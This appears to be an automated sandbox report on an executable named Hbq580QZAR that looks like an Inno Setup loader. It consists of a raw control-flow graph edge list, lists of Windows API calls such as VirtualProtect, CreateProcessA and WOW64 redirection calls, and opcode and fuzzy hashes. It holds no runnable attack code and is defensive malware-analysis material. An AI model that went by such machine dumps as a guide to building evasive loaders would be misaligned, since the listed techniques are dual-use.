5811->5810 5813 401348 5812->5813 5814 4012e4 LocalAlloc 5813->5814 5815 40138f 5814->5815 5815->5786 5819 40153b 5816->5819 5817 401594 5817->5788 5818 401568 VirtualFree 5818->5819 5819->5817 5819->5818 5823 40128c 5820->5823 5824 401298 LocalAlloc 5823->5824 5825 4012aa 5823->5825 5824->5825 5825->5804 5825->5807 5827 401d89 5826->5827 5829 401d92 5826->5829 5827->5829 5835 401b74 5827->5835 5829->5796 5831 401b61 5830->5831 5832 401b52 5830->5832 5831->5799 5833 401d00 9 API calls 5832->5833 5834 401b5f 5833->5834 5834->5799 5838 40215c 5835->5838 5837 401b95 5837->5829 5839 40217a 5838->5839 5840 402175 5838->5840 5842 4021ab RtlEnterCriticalSection 5839->5842 5843 40217e 5839->5843 5850 4021b5 5839->5850 5841 401918 4 API calls 5840->5841 5841->5839 5842->5850 5843->5837 5844 4021c1 5846 4022e3 RtlLeaveCriticalSection 5844->5846 5847 4022ed 5844->5847 5845 402244 5845->5843 5848 401d80 7 API calls 5845->5848 5846->5847 5847->5837 5848->5843 5849 402270 5849->5844 5851 401d00 7 API calls 5849->5851 5850->5844 5850->5845 5850->5849 5851->5844 5853 401c7a 5852->5853 5854 401c9d 5853->5854 5855 401caf 5853->5855 5865 40188c 5854->5865 5857 40188c 3 API calls 5855->5857 5858 401cad 5857->5858 5859 401b44 9 API calls 5858->5859 5864 401cc5 5858->5864 5860 401cd4 5859->5860 5861 401cee 5860->5861 5875 401b98 5860->5875 5880 4013a0 5861->5880 5864->5781 5866 4018b2 5865->5866 5874 40190b 5865->5874 5884 401658 5866->5884 5869 40132c LocalAlloc 5870 4018cf 5869->5870 5871 40150c VirtualFree 5870->5871 5872 4018e6 5870->5872 5871->5872 5873 4013a0 LocalAlloc 5872->5873 5872->5874 5873->5874 5874->5858 5876 401bab 5875->5876 5877 401b9d 5875->5877 5876->5861 5878 401b74 9 API calls 5877->5878 5879 401baa 5878->5879 5879->5861 5881 4013ab 5880->5881 5882 4013c6 5881->5882 5883 4012e4 LocalAlloc 5881->5883 5882->5864 5883->5882 5886 40168f 5884->5886 5885 4016cf 5885->5869 5886->5885 5887 4016a9 VirtualFree 5886->5887 5887->5886 6844 402dfa 6845 402e0d 6844->6845 6847 
402e26 6844->6847 6848 402ba4 6845->6848 6849 402bc9 6848->6849 6850 402bad 6848->6850 6849->6847 6851 402bb5 RaiseException 6850->6851 6851->6849 6852 4075fa GetFileSize 6853 407626 6852->6853 6854 407616 GetLastError 6852->6854 6854->6853 6855 40761f 6854->6855 6856 40748c 35 API calls 6855->6856 6856->6853 6857 406ffb 6858 407008 SetErrorMode 6857->6858 6526 403a80 CloseHandle 6527 403a90 6526->6527 6528 403a91 GetLastError 6526->6528 6529 404283 6530 4042c3 6529->6530 6531 403154 4 API calls 6530->6531 6532 404323 6531->6532 6859 404185 6860 4041ff 6859->6860 6861 4041cc 6860->6861 6862 403154 4 API calls 6860->6862 6863 404323 6862->6863 6533 403e87 6534 403e4c 6533->6534 6535 403e62 6534->6535 6536 403e7b 6534->6536 6539 403e67 6534->6539 6542 403cc8 6535->6542 6537 402674 4 API calls 6536->6537 6540 403e78 6537->6540 6539->6540 6546 402674 6539->6546 6543 403cd6 6542->6543 6544 402674 4 API calls 6543->6544 6545 403ceb 6543->6545 6544->6545 6545->6539 6547 403154 4 API calls 6546->6547 6548 40267a 6547->6548 6548->6540 6557 407e90 6558 407eb8 VirtualFree 6557->6558 6559 407e9d 6558->6559 6562 403e95 6563 403e4c 6562->6563 6564 403e62 6563->6564 6565 403e7b 6563->6565 6569 403e67 6563->6569 6567 403cc8 4 API calls 6564->6567 6566 402674 4 API calls 6565->6566 6568 403e78 6566->6568 6567->6569 6569->6568 6570 402674 4 API calls 6569->6570 6570->6568 6571 40ac97 6580 4096fc 6571->6580 6574 402f24 5 API calls 6575 40aca1 6574->6575 6576 403198 4 API calls 6575->6576 6577 40acc0 6576->6577 6578 403198 4 API calls 6577->6578 6579 40acc8 6578->6579 6589 4056ac 6580->6589 6582 409717 6583 409745 6582->6583 6595 40720c 6582->6595 6585 403198 4 API calls 6583->6585 6587 40975a 6585->6587 6586 409735 6588 40973d MessageBoxA 6586->6588 6587->6574 6587->6575 6588->6583 6590 403154 4 API calls 6589->6590 6591 4056b1 6590->6591 6592 4056c9 6591->6592 6593 403154 4 API calls 6591->6593 6592->6582 6594 4056bf 6593->6594 6594->6582 6596 4056ac 4 API calls 6595->6596 6597 
40721b 6596->6597 6598 407221 6597->6598 6600 40722f 6597->6600 6599 40322c 4 API calls 6598->6599 6601 40722d 6599->6601 6602 40724b 6600->6602 6603 40723f 6600->6603 6601->6586 6613 4032b8 6602->6613 6606 4071d0 6603->6606 6607 40322c 4 API calls 6606->6607 6608 4071df 6607->6608 6609 4071fc 6608->6609 6610 406950 CharPrevA 6608->6610 6609->6601 6611 4071eb 6610->6611 6611->6609 6612 4032fc 18 API calls 6611->6612 6612->6609 6614 403278 18 API calls 6613->6614 6615 4032c2 6614->6615 6615->6601 6616 403a97 6617 403aac 6616->6617 6618 403ab2 6617->6618 6619 403bbc GetStdHandle 6617->6619 6620 403b0e CreateFileA 6617->6620 6621 403c17 GetLastError 6619->6621 6633 403bba 6619->6633 6620->6621 6622 403b2c 6620->6622 6621->6618 6624 403b3b GetFileSize 6622->6624 6622->6633 6624->6621 6625 403b4e SetFilePointer 6624->6625 6625->6621 6629 403b6a ReadFile 6625->6629 6626 403be7 GetFileType 6626->6618 6628 403c02 CloseHandle 6626->6628 6628->6618 6629->6621 6630 403b8c 6629->6630 6631 403b9f SetFilePointer 6630->6631 6630->6633 6631->6621 6632 403bb0 SetEndOfFile 6631->6632 6632->6621 6632->6633 6633->6618 6633->6626 6638 40aaa2 6639 40aad2 6638->6639 6640 40aadc CreateWindowExA SetWindowLongA 6639->6640 6641 405194 33 API calls 6640->6641 6642 40ab5f 6641->6642 6643 4032fc 18 API calls 6642->6643 6644 40ab6d 6643->6644 6645 4032fc 18 API calls 6644->6645 6646 40ab7a 6645->6646 6647 406b7c 19 API calls 6646->6647 6648 40ab86 6647->6648 6649 4032fc 18 API calls 6648->6649 6650 40ab8f 6649->6650 6651 4099ec 43 API calls 6650->6651 6652 40aba1 6651->6652 6653 4098cc 19 API calls 6652->6653 6654 40abb4 6652->6654 6653->6654 6655 40abed 6654->6655 6656 4094d8 9 API calls 6654->6656 6657 40ac06 6655->6657 6660 40ac00 RemoveDirectoryA 6655->6660 6656->6655 6658 40ac1a 6657->6658 6659 40ac0f DestroyWindow 6657->6659 6661 40ac42 6658->6661 6662 40357c 4 API calls 6658->6662 6659->6658 6660->6657 6663 40ac38 6662->6663 6664 4025ac 4 API calls 6663->6664 6664->6661 6876 405ba2 6878 
405ba4 6876->6878 6877 405be0 6881 405940 19 API calls 6877->6881 6878->6877 6879 405bf7 6878->6879 6880 405bda 6878->6880 6885 404cdc 19 API calls 6879->6885 6880->6877 6883 405c4c 6880->6883 6882 405bf3 6881->6882 6887 403198 4 API calls 6882->6887 6884 4059b0 33 API calls 6883->6884 6884->6882 6886 405c20 6885->6886 6888 4059b0 33 API calls 6886->6888 6889 405c86 6887->6889 6888->6882 6890 408da4 6891 408dc8 6890->6891 6892 408c80 18 API calls 6891->6892 6893 408dd1 6892->6893 6665 402caa 6666 403154 4 API calls 6665->6666 6667 402caf 6666->6667 6908 4011aa 6909 4011ac GetStdHandle 6908->6909 6668 4028ac 6669 402594 18 API calls 6668->6669 6670 4028b6 6669->6670 4980 40aab4 4981 40aab8 SetLastError 4980->4981 5012 409648 GetLastError 4981->5012 4984 40aad2 4986 40aadc CreateWindowExA SetWindowLongA 4984->4986 5025 405194 4986->5025 4990 40ab6d 4991 4032fc 18 API calls 4990->4991 4992 40ab7a 4991->4992 5042 406b7c GetCommandLineA 4992->5042 4995 4032fc 18 API calls 4996 40ab8f 4995->4996 5047 4099ec 4996->5047 4998 40aba1 5000 40abb4 4998->5000 5068 4098cc 4998->5068 5001 40abd4 5000->5001 5002 40abed 5000->5002 5074 4094d8 5001->5074 5004 40ac06 5002->5004 5007 40ac00 RemoveDirectoryA 5002->5007 5005 40ac1a 5004->5005 5006 40ac0f DestroyWindow 5004->5006 5008 40ac42 5005->5008 5082 40357c 5005->5082 5006->5005 5007->5004 5010 40ac38 5095 4025ac 5010->5095 5099 404c94 5012->5099 5020 4096c3 5114 4031b8 5020->5114 5026 4051a8 33 API calls 5025->5026 5027 4051a3 5026->5027 5028 4032fc 5027->5028 5029 403300 5028->5029 5030 40333f 5028->5030 5031 4031e8 5029->5031 5032 40330a 5029->5032 5030->4990 5038 403254 18 API calls 5031->5038 5039 4031fc 5031->5039 5033 403334 5032->5033 5034 40331d 5032->5034 5035 4034f0 18 API calls 5033->5035 5275 4034f0 5034->5275 5041 403322 5035->5041 5036 403228 5036->4990 5038->5039 5039->5036 5040 4025ac 4 API calls 5039->5040 5040->5036 5041->4990 5301 406af0 5042->5301 5044 406ba1 5045 403198 4 API calls 5044->5045 5046 406bbf 
5045->5046 5046->4995 5315 4033b4 5047->5315 5049 409a27 5050 409a59 CreateProcessA 5049->5050 5051 409a65 5050->5051 5052 409a6c CloseHandle 5050->5052 5053 409648 35 API calls 5051->5053 5054 409a75 5052->5054 5053->5052 5055 4099c0 TranslateMessage DispatchMessageA PeekMessageA 5054->5055 5056 409a7a MsgWaitForMultipleObjects 5055->5056 5056->5054 5057 409a91 5056->5057 5058 4099c0 TranslateMessage DispatchMessageA PeekMessageA 5057->5058 5059 409a96 GetExitCodeProcess CloseHandle 5058->5059 5060 409ab6 5059->5060 5061 403198 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5060->5061 5062 409abe 5061->5062 5062->4998 5063 402f24 5064 403154 4 API calls 5063->5064 5065 402f29 5064->5065 5321 402bcc 5065->5321 5067 402f51 5067->5067 5069 40990e 5068->5069 5070 4098d4 5068->5070 5069->5000 5070->5069 5071 403420 18 API calls 5070->5071 5072 409908 5071->5072 5324 408e80 5072->5324 5075 409532 5074->5075 5079 4094eb 5074->5079 5075->5002 5076 4094f3 Sleep 5076->5079 5077 409503 Sleep 5077->5079 5079->5075 5079->5076 5079->5077 5080 40951a GetLastError 5079->5080 5347 408fbc 5079->5347 5080->5075 5081 409524 GetLastError 5080->5081 5081->5075 5081->5079 5085 403591 5082->5085 5091 4035a0 5082->5091 5083 4035b1 5086 403198 4 API calls 5083->5086 5084 4035b8 5087 4031b8 4 API calls 5084->5087 5088 4035d0 5085->5088 5089 40359b 5085->5089 5090 4035b6 5085->5090 5086->5090 5087->5090 5088->5090 5093 40357c 4 API calls 5088->5093 5089->5091 5092 4035ec 5089->5092 5090->5010 5091->5083 5091->5084 5092->5090 5364 403554 5092->5364 5093->5088 5096 4025b0 5095->5096 5098 4025ba 5095->5098 5097 403154 4 API calls 5096->5097 5096->5098 5097->5098 5098->5008 5122 4051a8 5099->5122 5102 407284 FormatMessageA 5103 4072aa 5102->5103 5104 403278 18 API calls 5103->5104 5105 4072c7 5104->5105 5106 408da8 5105->5106 5107 408dc8 5106->5107 5265 408c80 5107->5265 5110 405890 5111 405897 5110->5111 5112 4031e8 18 API calls 5111->5112 5113 4058af 5112->5113 5113->5020 5116 4031be 
5114->5116 5115 4031e3 5118 403198 5115->5118 5116->5115 5117 4025ac 4 API calls 5116->5117 5117->5116 5119 4031b7 5118->5119 5120 40319e 5118->5120 5119->4984 5119->5063 5120->5119 5121 4025ac 4 API calls 5120->5121 5121->5119 5123 4051c5 5122->5123 5130 404e58 5123->5130 5126 4051f1 5135 403278 5126->5135 5132 404e73 5130->5132 5131 404e85 5131->5126 5140 404be4 5131->5140 5132->5131 5143 404f7a 5132->5143 5150 404e4c 5132->5150 5136 403254 18 API calls 5135->5136 5137 403288 5136->5137 5138 403198 4 API calls 5137->5138 5139 4032a0 5138->5139 5139->5102 5257 405940 5140->5257 5142 404bf5 5142->5126 5144 404f8b 5143->5144 5148 404fd9 5143->5148 5147 40505f 5144->5147 5144->5148 5146 404ff7 5146->5132 5147->5146 5157 404e38 5147->5157 5148->5146 5153 404df4 5148->5153 5151 403198 4 API calls 5150->5151 5152 404e56 5151->5152 5152->5132 5154 404e02 5153->5154 5160 404bfc 5154->5160 5156 404e30 5156->5148 5187 4039a4 5157->5187 5163 4059b0 5160->5163 5162 404c15 5162->5156 5164 4059be 5163->5164 5173 404cdc LoadStringA 5164->5173 5167 405194 33 API calls 5168 4059f6 5167->5168 5176 4031e8 5168->5176 5171 4031b8 4 API calls 5172 405a1b 5171->5172 5172->5162 5174 403278 18 API calls 5173->5174 5175 404d09 5174->5175 5175->5167 5177 4031ec 5176->5177 5180 4031fc 5176->5180 5177->5180 5182 403254 5177->5182 5178 403228 5178->5171 5180->5178 5181 4025ac 4 API calls 5180->5181 5181->5178 5183 403274 5182->5183 5184 403258 5182->5184 5183->5180 5185 402594 18 API calls 5184->5185 5186 403261 5185->5186 5186->5180 5188 4039ab 5187->5188 5193 4038b4 5188->5193 5190 4039cb 5191 403198 4 API calls 5190->5191 5192 4039d2 5191->5192 5192->5146 5194 4038d5 5193->5194 5195 4038c8 5193->5195 5197 403934 5194->5197 5198 4038db 5194->5198 5221 403780 5195->5221 5199 403993 5197->5199 5200 40393b 5197->5200 5201 4038e1 5198->5201 5202 4038ee 5198->5202 5203 4037f4 3 API calls 5199->5203 5204 403941 5200->5204 5205 40394b 5200->5205 5228 403894 5201->5228 5207 403894 6 API calls 
5202->5207 5210 4038d0 5203->5210 5243 403864 5204->5243 5209 4037f4 3 API calls 5205->5209 5211 4038fc 5207->5211 5212 40395d 5209->5212 5210->5190 5233 4037f4 5211->5233 5215 403864 23 API calls 5212->5215 5214 403917 5239 40374c 5214->5239 5216 403976 5215->5216 5219 40374c VariantClear 5216->5219 5218 40392c 5218->5190 5220 40398b 5219->5220 5220->5190 5222 4037f0 5221->5222 5224 403744 5221->5224 5222->5210 5223 403793 VariantClear 5223->5224 5224->5221 5224->5223 5225 4037ab 5224->5225 5226 4037dc VariantCopyInd 5224->5226 5227 403198 4 API calls 5224->5227 5225->5210 5226->5222 5226->5224 5227->5224 5248 4036b8 5228->5248 5231 40374c VariantClear 5232 4038a9 5231->5232 5232->5210 5234 403845 VariantChangeTypeEx 5233->5234 5235 40380a VariantChangeTypeEx 5233->5235 5238 403832 5234->5238 5236 403826 5235->5236 5237 40374c VariantClear 5236->5237 5237->5238 5238->5214 5240 403759 5239->5240 5241 403766 5239->5241 5240->5241 5242 403779 VariantClear 5240->5242 5241->5218 5242->5218 5254 40369c SysStringLen 5243->5254 5246 40374c VariantClear 5247 403882 5246->5247 5247->5210 5249 4036cb 5248->5249 5250 403706 MultiByteToWideChar SysAllocStringLen MultiByteToWideChar 5249->5250 5251 4036db 5249->5251 5252 40372e 5250->5252 5253 4036ed MultiByteToWideChar SysAllocStringLen 5251->5253 5252->5231 5253->5252 5255 403610 21 API calls 5254->5255 5256 4036b3 5255->5256 5256->5246 5258 40594c 5257->5258 5259 404cdc 19 API calls 5258->5259 5260 405972 5259->5260 5261 4031e8 18 API calls 5260->5261 5262 40597d 5261->5262 5263 403198 4 API calls 5262->5263 5264 405992 5263->5264 5264->5142 5266 403198 4 API calls 5265->5266 5268 408cb1 5265->5268 5266->5268 5267 4031b8 4 API calls 5269 408d69 5267->5269 5270 408cc8 5268->5270 5271 403278 18 API calls 5268->5271 5273 408cdc 5268->5273 5274 4032fc 18 API calls 5268->5274 5269->5110 5272 4032fc 18 API calls 5270->5272 5271->5268 5272->5273 5273->5267 5274->5268 5276 4034fd 5275->5276 5283 40352d 5275->5283 5278 403526 
                                                                                            [Control-flow graph residue: a fragment of the edge list for the preceding function graph, whose basic blocks call TlsGetValue, LocalAlloc, TlsSetValue, RaiseException, InterlockedExchange, DeleteFileA, GetLastError, SetLastError, Wow64DisableWow64FsRedirection, Wow64RevertWow64FsRedirection, RtlLeaveCriticalSection and RtlDeleteCriticalSection; the node-to-node edge dump itself is not reproduced here.]

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 116 409b78-409b9c GetSystemInfo VirtualQuery 117 409ba2 116->117 118 409c2c-409c33 116->118 119 409c21-409c26 117->119 119->118 120 409ba4-409bab 119->120 121 409c0d-409c1f VirtualQuery 120->121 122 409bad-409bb1 120->122 121->118 121->119 122->121 123 409bb3-409bbb 122->123 124 409bcc-409bdd VirtualProtect 123->124 125 409bbd-409bc0 123->125 127 409be1-409be3 124->127 128 409bdf 124->128 125->124 126 409bc2-409bc5 125->126 126->124 129 409bc7-409bca 126->129 130 409bf2-409bf5 127->130 128->127 129->124 129->127 131 409be5-409bee call 409b70 130->131 132 409bf7-409bf9 130->132 131->130 132->121 133 409bfb-409c08 VirtualProtect 132->133 133->121
                                                                                            APIs
                                                                                            • GetSystemInfo.KERNEL32(?), ref: 00409B8A
                                                                                            • VirtualQuery.KERNEL32(00400000,?,0000001C,?), ref: 00409B95
                                                                                            • VirtualProtect.KERNEL32(?,?,00000040,?,00400000,?,0000001C,?), ref: 00409BD6
                                                                                            • VirtualProtect.KERNEL32(?,?,?,?,?,?,00000040,?,00400000,?,0000001C,?), ref: 00409C08
                                                                                            • VirtualQuery.KERNEL32(?,?,0000001C,00400000,?,0000001C,?), ref: 00409C18
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2733424238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2733392755.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2733466583.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2733559837.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Virtual$ProtectQuery$InfoSystem
                                                                                            • String ID:
                                                                                            • API String ID: 2441996862-0
                                                                                            • Opcode ID: 69cc1b0b9b744b29044eea84e4744ba7a66f7205e02ae19cc0529fdcfa929845
                                                                                            • Instruction ID: 4a1d84bb43d4a47cf168f169447d483ed62c711ee8ccb48f5bfbfd053dbeaed9
                                                                                            • Opcode Fuzzy Hash: 69cc1b0b9b744b29044eea84e4744ba7a66f7205e02ae19cc0529fdcfa929845
                                                                                            • Instruction Fuzzy Hash: D421A1B16043006BDA309AA99C85E57B7E8AF45360F144C2BFA99E72C3D239FC40C669
                                                                                            APIs
                                                                                            • GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052D7,?,00000000,004053B6), ref: 0040522A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2733424238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2733392755.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2733466583.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2733559837.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: InfoLocale
                                                                                            • String ID:
                                                                                            • API String ID: 2299586839-0
                                                                                            • Opcode ID: 08facca5f8c818d7ae0117448837c5e97f15c9e55cb3aedc2694e0bc5091a832
                                                                                            • Instruction ID: 1248db9972fbf410c55bf070b604c98f5d62b90992f8f49b6b6440a9954d2c50
                                                                                            • Opcode Fuzzy Hash: 08facca5f8c818d7ae0117448837c5e97f15c9e55cb3aedc2694e0bc5091a832
                                                                                            • Instruction Fuzzy Hash: E2E0927170021427D710A9A99C86AEB725CEB58310F0002BFB904E73C6EDB49E804AED

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040A618), ref: 00404582
                                                                                            • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040458F
                                                                                            • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 004045A5
                                                                                            • GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 004045BB
                                                                                            • SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,0040A618), ref: 004045C6
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2733424238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2733392755.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2733466583.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2733559837.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$HandleModulePolicyProcess
                                                                                            • String ID: SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$kernel32.dll
                                                                                            • API String ID: 3256987805-3653653586
                                                                                            • Opcode ID: 5152b1c660b0fef0348360efae9d442e0d6811f491f57bfacbbc157bf84edc67
                                                                                            • Instruction ID: 1f393095ee8ecda9e1e01b6ca7d440447e938bbc9796bcd5dbe8d266940e5f64
                                                                                            • Opcode Fuzzy Hash: 5152b1c660b0fef0348360efae9d442e0d6811f491f57bfacbbc157bf84edc67
                                                                                            • Instruction Fuzzy Hash: 5FE02DD03813013AEA5032F20D83B2B20884AD0B49B2414377F25B61C3EDBDDA40587E

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • SetLastError.KERNEL32 ref: 0040AAC1
                                                                                              • Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B244,?,020824A0), ref: 0040966C
                                                                                            • CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040AAFE
                                                                                            • SetWindowLongA.USER32(0001042E,000000FC,00409960), ref: 0040AB15
                                                                                            • RemoveDirectoryA.KERNEL32(00000000,0040AC54,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040AC01
                                                                                            • DestroyWindow.USER32(0001042E,0040AC54,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040AC15
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2733424238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2733392755.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2733466583.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2733559837.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$ErrorLast$CreateDestroyDirectoryLongRemove
                                                                                            • String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
                                                                                            • API String ID: 3757039580-3001827809
                                                                                            • Opcode ID: 7bc9c0c8e9dfd2478b94306391eafe1fb51b7566d8199cdbb2b2653dcbc3d95c
                                                                                            • Instruction ID: 81987b3bab642c92fe87a7372e0454594c4b8fe140ce311e0f93b1eeebf6ab37
                                                                                            • Opcode Fuzzy Hash: 7bc9c0c8e9dfd2478b94306391eafe1fb51b7566d8199cdbb2b2653dcbc3d95c
                                                                                            • Instruction Fuzzy Hash: 25412E70604204DBDB10EBA9EE89B9E37A5EB44304F10467FF510B72E2D7B89855CB9D

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,0040A62C), ref: 004090C4
                                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090CA
                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,0040A62C), ref: 004090DE
                                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090E4
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2733424238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2733392755.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2733466583.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2733559837.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressHandleModuleProc
                                                                                            • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                                                            • API String ID: 1646373207-2130885113
                                                                                            • Opcode ID: 0414f1d66f28dc470df4633e5994336701384173b3f6f66b470f3ad827f759f7
                                                                                            • Instruction ID: 214dda5481ef482ebe311b1329301f35405b1013d97e3062c17ffb2c8286d57d
                                                                                            • Opcode Fuzzy Hash: 0414f1d66f28dc470df4633e5994336701384173b3f6f66b470f3ad827f759f7
                                                                                            • Instruction Fuzzy Hash: 21017C70748342AEFB00BB76DD4AB163A68E785704F60457BF640BA2D3DABD4C04D66E

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040AAFE
                                                                                            • SetWindowLongA.USER32(0001042E,000000FC,00409960), ref: 0040AB15
                                                                                              • Part of subcall function 00406B7C: GetCommandLineA.KERNEL32(00000000,00406BC0,?,?,?,?,00000000,?,0040AB86,?), ref: 00406B94
                                                                                              • Part of subcall function 004099EC: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,020824A0,00409AD8,00000000,00409ABF), ref: 00409A5C
                                                                                              • Part of subcall function 004099EC: CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,020824A0,00409AD8,00000000), ref: 00409A70
                                                                                              • Part of subcall function 004099EC: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409A89
                                                                                              • Part of subcall function 004099EC: GetExitCodeProcess.KERNEL32(?,0040B244), ref: 00409A9B
                                                                                              • Part of subcall function 004099EC: CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,020824A0,00409AD8), ref: 00409AA4
                                                                                            • RemoveDirectoryA.KERNEL32(00000000,0040AC54,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040AC01
                                                                                            • DestroyWindow.USER32(0001042E,0040AC54,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040AC15
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2733424238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2733392755.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2733466583.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2733559837.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$CloseCreateHandleProcess$CodeCommandDestroyDirectoryExitLineLongMultipleObjectsRemoveWait
                                                                                            • String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
                                                                                            • API String ID: 3586484885-3001827809
                                                                                            • Opcode ID: c367800830601d7b7bb1e4b9cc729c69669d466ec6c890b8506752b9ad64910a
                                                                                            • Instruction ID: d3376fcde1141b4290a3dca450fc2844fa47922897975e075ebf06e3b6db64eb
                                                                                            • Opcode Fuzzy Hash: c367800830601d7b7bb1e4b9cc729c69669d466ec6c890b8506752b9ad64910a
                                                                                            • Instruction Fuzzy Hash: 77411A71604204DFD714EBA9EE85B5A37B5EB48304F20427BF500BB2E1D7B8A855CB9D

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,020824A0,00409AD8,00000000,00409ABF), ref: 00409A5C
                                                                                            • CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,020824A0,00409AD8,00000000), ref: 00409A70
                                                                                            • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409A89
                                                                                            • GetExitCodeProcess.KERNEL32(?,0040B244), ref: 00409A9B
